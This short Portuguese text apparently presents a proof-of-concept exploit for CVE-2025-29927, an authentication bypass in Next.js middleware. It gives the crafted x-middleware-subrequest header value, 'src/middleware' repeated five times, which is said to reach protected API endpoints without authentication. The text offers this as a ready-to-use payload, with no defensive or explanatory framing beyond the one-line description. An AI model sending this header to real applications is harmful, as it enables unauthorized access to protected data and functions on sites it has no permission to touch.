
Exploit de prova de conceito para CVE-2025-29927: contorna a autenticação do middleware Next.js injetando um cabeçalho x-middleware-subrequest criado para acessar endpoints de API protegidos.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware como cabeçalho